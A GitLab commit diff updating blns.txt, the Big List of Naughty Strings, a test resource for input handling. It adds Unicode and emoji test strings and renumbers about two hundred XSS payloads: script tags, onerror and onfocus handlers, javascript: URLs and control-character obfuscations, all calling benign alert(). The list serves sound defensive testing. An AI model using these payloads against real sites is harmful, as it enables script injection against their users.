Skip to content
Snippets Groups Projects
Unverified Commit 686dae54 authored by Janne Mareike Koschinski's avatar Janne Mareike Koschinski
Browse files

Update BLNS

parent 17f79b49
No related branches found
No related tags found
No related merge requests found
Pipeline #2482 failed
Stage: build
Stage: test
Stage: deploy
Show whitespace changes
Inline Side-by-side
lib/src/test/resources/blns.txt
+ 260
230
View file @ 686dae54
...@@ -18,6 +18,7 @@ FALSE ...@@ -18,6 +18,7 @@ FALSE
None None
hasOwnProperty hasOwnProperty
then then
constructor
\ \
\\ \\
...@@ -127,7 +128,7 @@ INF ...@@ -127,7 +128,7 @@ INF
# U+0000, U+000A, or U+000D (NUL, LF, CR). # U+0000, U+000A, or U+000D (NUL, LF, CR).
# The next line may appear to be blank or mojibake in some viewers. # The next line may appear to be blank or mojibake in some viewers.
# The next line may be flagged for "trailing whitespace" in some viewers. # The next line may be flagged for "trailing whitespace" in some viewers.
… ​

 … ​


# Unicode additional control characters: all of the characters with # Unicode additional control characters: all of the characters with
# general category Cf (in Unicode 8.0.0). # general category Cf (in Unicode 8.0.0).
...@@ -194,6 +195,10 @@ INF ...@@ -194,6 +195,10 @@ INF
울란바토르 울란바토르
𠜎𠜱𠝹𠱓𠱸𠲖𠳏 𠜎𠜱𠝹𠱓𠱸𠲖𠳏
# Strings which contain two-byte letters: can cause issues with naïve UTF-16 capitalizers which think that 16 bits == 1 character
𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆
# Special Unicode Characters Union # Special Unicode Characters Union
# #
# A super string recommended by VMware Inc. Globalization Team: can effectively cause rendering issues or character-length issues to validate product globalization readiness. # A super string recommended by VMware Inc. Globalization Team: can effectively cause rendering issues or character-length issues to validate product globalization readiness.
...@@ -249,10 +254,12 @@ __ロ(,_,*) ...@@ -249,10 +254,12 @@ __ロ(,_,*)
😍 😍
👩🏽 👩🏽
👨‍🦰 👨🏿‍🦰 👨‍🦱 👨🏿‍🦱 🦹🏿‍♂️
👾 🙇 💁 🙅 🙆 🙋 🙎 🙍 👾 🙇 💁 🙅 🙆 🙋 🙎 🙍
🐵 🙈 🙉 🙊 🐵 🙈 🙉 🙊
❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙 ❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙
✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿 ✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿
👨‍👩‍👦 👨‍👩‍👧‍👦 👨‍👨‍👦 👩‍👩‍👧 👨‍👦 👨‍👧‍👦 👩‍👦 👩‍👧‍👦
🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧 🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧
0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟 0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟
...@@ -281,7 +288,15 @@ __ロ(,_,*) ...@@ -281,7 +288,15 @@ __ロ(,_,*)
הָיְתָהtestالصفحات التّحول הָיְתָהtestالصفحات التّحول
مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ،
الكل في المجمو عة (5)
# Ogham Text
#
# The only unicode alphabet to use a space which isn't empty but should still act like a space.
᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜
᚛ ᚜
# Trick Unicode # Trick Unicode
# #
...@@ -327,242 +342,242 @@ Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮ ...@@ -327,242 +342,242 @@ Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮
# #
# Strings which attempt to invoke a benign script injection; shows vulnerability to XSS # Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
<script>alert(123)</script> <script>alert(0)</script>
&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt; &lt;script&gt;alert(&#39;1&#39;);&lt;/script&gt;
<img src=x onerror=alert(123) /> <img src=x onerror=alert(2) />
<svg><script>123<1>alert(123)</script> <svg><script>123<1>alert(3)</script>
"><script>alert(123)</script> "><script>alert(4)</script>
'><script>alert(123)</script> '><script>alert(5)</script>
><script>alert(123)</script> ><script>alert(6)</script>
</script><script>alert(123)</script> </script><script>alert(7)</script>
< / script >< script >alert(123)< / script > < / script >< script >alert(8)< / script >
onfocus=JaVaSCript:alert(123) autofocus onfocus=JaVaSCript:alert(9) autofocus
" onfocus=JaVaSCript:alert(123) autofocus " onfocus=JaVaSCript:alert(10) autofocus
' onfocus=JaVaSCript:alert(123) autofocus ' onfocus=JaVaSCript:alert(11) autofocus
<script>alert(123)</script> <script>alert(12)</script>
<sc<script>ript>alert(123)</sc</script>ript> <sc<script>ript>alert(13)</sc</script>ript>
--><script>alert(123)</script> --><script>alert(14)</script>
";alert(123);t=" ";alert(15);t="
';alert(123);t=' ';alert(16);t='
JavaSCript:alert(123) JavaSCript:alert(17)
;alert(123); ;alert(18);
src=JaVaSCript:prompt(132) src=JaVaSCript:prompt(19)
"><script>alert(123);</script x=" "><script>alert(20);</script x="
'><script>alert(123);</script x=' '><script>alert(21);</script x='
><script>alert(123);</script x= ><script>alert(22);</script x=
" autofocus onkeyup="javascript:alert(123) " autofocus onkeyup="javascript:alert(23)
' autofocus onkeyup='javascript:alert(123) ' autofocus onkeyup='javascript:alert(24)
<script\x20type="text/javascript">javascript:alert(1);</script> <script\x20type="text/javascript">javascript:alert(25);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script> <script\x3Etype="text/javascript">javascript:alert(26);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script> <script\x0Dtype="text/javascript">javascript:alert(27);</script>
<script\x09type="text/javascript">javascript:alert(1);</script> <script\x09type="text/javascript">javascript:alert(28);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script> <script\x0Ctype="text/javascript">javascript:alert(29);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script> <script\x2Ftype="text/javascript">javascript:alert(30);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script> <script\x0Atype="text/javascript">javascript:alert(31);</script>
'`"><\x3Cscript>javascript:alert(1)</script> '`"><\x3Cscript>javascript:alert(32)</script>
'`"><\x00script>javascript:alert(1)</script> '`"><\x00script>javascript:alert(33)</script>
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF ABC<div style="x\x3Aexpression(javascript:alert(34)">DEF
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF ABC<div style="x:expression\x5C(javascript:alert(35)">DEF
ABC<div style="x:expression\x00(javascript:alert(1)">DEF ABC<div style="x:expression\x00(javascript:alert(36)">DEF
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF ABC<div style="x:exp\x00ression(javascript:alert(37)">DEF
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF ABC<div style="x:exp\x5Cression(javascript:alert(38)">DEF
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Aexpression(javascript:alert(39)">DEF
ABC<div style="x:\x09expression(javascript:alert(1)">DEF ABC<div style="x:\x09expression(javascript:alert(40)">DEF
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE3\x80\x80expression(javascript:alert(41)">DEF
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x84expression(javascript:alert(42)">DEF
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF ABC<div style="x:\xC2\xA0expression(javascript:alert(43)">DEF
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x80expression(javascript:alert(44)">DEF
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(45)">DEF
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Dexpression(javascript:alert(46)">DEF
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Cexpression(javascript:alert(47)">DEF
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x87expression(javascript:alert(48)">DEF
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(49)">DEF
ABC<div style="x:\x20expression(javascript:alert(1)">DEF ABC<div style="x:\x20expression(javascript:alert(50)">DEF
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x88expression(javascript:alert(51)">DEF
ABC<div style="x:\x00expression(javascript:alert(1)">DEF ABC<div style="x:\x00expression(javascript:alert(52)">DEF
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(53)">DEF
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x86expression(javascript:alert(54)">DEF
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x85expression(javascript:alert(55)">DEF
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x82expression(javascript:alert(56)">DEF
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF ABC<div style="x:\x0Bexpression(javascript:alert(57)">DEF
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x81expression(javascript:alert(58)">DEF
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x83expression(javascript:alert(59)">DEF
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF ABC<div style="x:\xE2\x80\x89expression(javascript:alert(60)">DEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x05javascript:javascript:alert(64)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x18javascript:javascript:alert(66)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x11javascript:javascript:alert(67)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x17javascript:javascript:alert(71)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x03javascript:javascript:alert(72)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x00javascript:javascript:alert(75)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x10javascript:javascript:alert(76)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x20javascript:javascript:alert(78)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x13javascript:javascript:alert(79)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x09javascript:javascript:alert(80)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x14javascript:javascript:alert(82)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x19javascript:javascript:alert(83)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x81javascript:javascript:alert(86)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Djavascript:javascript:alert(87)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x87javascript:javascript:alert(88)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x07javascript:javascript:alert(89)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE1\x9A\x80javascript:javascript:alert(90)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x83javascript:javascript:alert(91)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x04javascript:javascript:alert(92)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x01javascript:javascript:alert(93)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x08javascript:javascript:alert(94)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x84javascript:javascript:alert(95)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(96)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(97)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(98)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(99)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(100)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(101)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(102)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(103)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(104)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(105)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(106)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(107)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(108)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(109)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(110)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(111)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(112)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(113)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(114)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(115)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(116)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(117)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Aonerror=javascript:alert(118)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)> `"'><img src=xxx:x \x22onerror=javascript:alert(119)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(120)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)> `"'><img src=xxx:x \x0Donerror=javascript:alert(121)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(122)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)> `"'><img src=xxx:x \x09onerror=javascript:alert(123)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)> `"'><img src=xxx:x \x0Conerror=javascript:alert(124)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)> `"'><img src=xxx:x \x00onerror=javascript:alert(125)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)> `"'><img src=xxx:x \x27onerror=javascript:alert(126)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)> `"'><img src=xxx:x \x20onerror=javascript:alert(127)>
"`'><script>\x3Bjavascript:alert(1)</script> "`'><script>\x3Bjavascript:alert(128)</script>
"`'><script>\x0Djavascript:alert(1)</script> "`'><script>\x0Djavascript:alert(129)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(130)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script> "`'><script>\xE2\x80\x81javascript:alert(131)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script> "`'><script>\xE2\x80\x84javascript:alert(132)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script> "`'><script>\xE3\x80\x80javascript:alert(133)</script>
"`'><script>\x09javascript:alert(1)</script> "`'><script>\x09javascript:alert(134)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script> "`'><script>\xE2\x80\x89javascript:alert(135)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script> "`'><script>\xE2\x80\x85javascript:alert(136)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script> "`'><script>\xE2\x80\x88javascript:alert(137)</script>
"`'><script>\x00javascript:alert(1)</script> "`'><script>\x00javascript:alert(138)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script> "`'><script>\xE2\x80\xA8javascript:alert(139)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(140)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script> "`'><script>\xE1\x9A\x80javascript:alert(141)</script>
"`'><script>\x0Cjavascript:alert(1)</script> "`'><script>\x0Cjavascript:alert(142)</script>
"`'><script>\x2Bjavascript:alert(1)</script> "`'><script>\x2Bjavascript:alert(143)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(144)</script>
"`'><script>-javascript:alert(1)</script> "`'><script>-javascript:alert(145)</script>
"`'><script>\x0Ajavascript:alert(1)</script> "`'><script>\x0Ajavascript:alert(146)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script> "`'><script>\xE2\x80\xAFjavascript:alert(147)</script>
"`'><script>\x7Ejavascript:alert(1)</script> "`'><script>\x7Ejavascript:alert(148)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script> "`'><script>\xE2\x80\x87javascript:alert(149)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(150)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script> "`'><script>\xE2\x80\xA9javascript:alert(151)</script>
"`'><script>\xC2\x85javascript:alert(1)</script> "`'><script>\xC2\x85javascript:alert(152)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(153)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script> "`'><script>\xE2\x80\x83javascript:alert(154)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(155)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(156)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script> "`'><script>\xE2\x80\x80javascript:alert(157)</script>
"`'><script>\x21javascript:alert(1)</script> "`'><script>\x21javascript:alert(158)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script> "`'><script>\xE2\x80\x82javascript:alert(159)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script> "`'><script>\xE2\x80\x86javascript:alert(160)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(161)</script>
"`'><script>\x0Bjavascript:alert(1)</script> "`'><script>\x0Bjavascript:alert(162)</script>
"`'><script>\x20javascript:alert(1)</script> "`'><script>\x20javascript:alert(163)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script> "`'><script>\xC2\xA0javascript:alert(164)</script>
<img \x00src=x onerror="alert(1)"> <img \x00src=x onerror="alert(165)">
<img \x47src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(166)">
<img \x11src=x onerror="javascript:alert(1)"> <img \x11src=x onerror="javascript:alert(167)">
<img \x12src=x onerror="javascript:alert(1)"> <img \x12src=x onerror="javascript:alert(168)">
<img\x47src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(169)">
<img\x10src=x onerror="javascript:alert(1)"> <img\x10src=x onerror="javascript:alert(170)">
<img\x13src=x onerror="javascript:alert(1)"> <img\x13src=x onerror="javascript:alert(171)">
<img\x32src=x onerror="javascript:alert(1)"> <img\x32src=x onerror="javascript:alert(172)">
<img\x47src=x onerror="javascript:alert(1)"> <img\x47src=x onerror="javascript:alert(173)">
<img\x11src=x onerror="javascript:alert(1)"> <img\x11src=x onerror="javascript:alert(174)">
<img \x47src=x onerror="javascript:alert(1)"> <img \x47src=x onerror="javascript:alert(175)">
<img \x34src=x onerror="javascript:alert(1)"> <img \x34src=x onerror="javascript:alert(176)">
<img \x39src=x onerror="javascript:alert(1)"> <img \x39src=x onerror="javascript:alert(177)">
<img \x00src=x onerror="javascript:alert(1)"> <img \x00src=x onerror="javascript:alert(178)">
<img src\x09=x onerror="javascript:alert(1)"> <img src\x09=x onerror="javascript:alert(179)">
<img src\x10=x onerror="javascript:alert(1)"> <img src\x10=x onerror="javascript:alert(180)">
<img src\x13=x onerror="javascript:alert(1)"> <img src\x13=x onerror="javascript:alert(181)">
<img src\x32=x onerror="javascript:alert(1)"> <img src\x32=x onerror="javascript:alert(182)">
<img src\x12=x onerror="javascript:alert(1)"> <img src\x12=x onerror="javascript:alert(183)">
<img src\x11=x onerror="javascript:alert(1)"> <img src\x11=x onerror="javascript:alert(184)">
<img src\x00=x onerror="javascript:alert(1)"> <img src\x00=x onerror="javascript:alert(185)">
<img src\x47=x onerror="javascript:alert(1)"> <img src\x47=x onerror="javascript:alert(186)">
<img src=x\x09onerror="javascript:alert(1)"> <img src=x\x09onerror="javascript:alert(187)">
<img src=x\x10onerror="javascript:alert(1)"> <img src=x\x10onerror="javascript:alert(188)">
<img src=x\x11onerror="javascript:alert(1)"> <img src=x\x11onerror="javascript:alert(189)">
<img src=x\x12onerror="javascript:alert(1)"> <img src=x\x12onerror="javascript:alert(190)">
<img src=x\x13onerror="javascript:alert(1)"> <img src=x\x13onerror="javascript:alert(191)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)">
<img src=x onerror=\x09"javascript:alert(1)"> <img src=x onerror=\x09"javascript:alert(193)">
<img src=x onerror=\x10"javascript:alert(1)"> <img src=x onerror=\x10"javascript:alert(194)">
<img src=x onerror=\x11"javascript:alert(1)"> <img src=x onerror=\x11"javascript:alert(195)">
<img src=x onerror=\x12"javascript:alert(1)"> <img src=x onerror=\x12"javascript:alert(196)">
<img src=x onerror=\x32"javascript:alert(1)"> <img src=x onerror=\x32"javascript:alert(197)">
<img src=x onerror=\x00"javascript:alert(1)"> <img src=x onerror=\x00"javascript:alert(198)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(199)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `> <img src="x` `<script>javascript:alert(200)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//"> <img src onerror /" '"= alt=javascript:alert(201)//">
<title onpropertychange=javascript:alert(1)></title><title title=> <title onpropertychange=javascript:alert(202)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>"> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(203)></a>">
<!--[if]><script>javascript:alert(1)</script --> <!--[if]><script>javascript:alert(204)</script -->
<!--[if<img src=x onerror=javascript:alert(1)//]> --> <!--[if<img src=x onerror=javascript:alert(205)//]> -->
<script src="/\%(jscript)s"></script> <script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script> <script src="\\%(jscript)s"></script>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG """><SCRIPT>alert("206")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert(String.fromCharCode(50,48,55))>
<IMG SRC=# onmouseover="alert('xxs')"> <IMG SRC=# onmouseover="alert('208')">
<IMG SRC= onmouseover="alert('xxs')"> <IMG SRC= onmouseover="alert('209')">
<IMG onmouseover="alert('xxs')"> <IMG onmouseover="alert('210')">
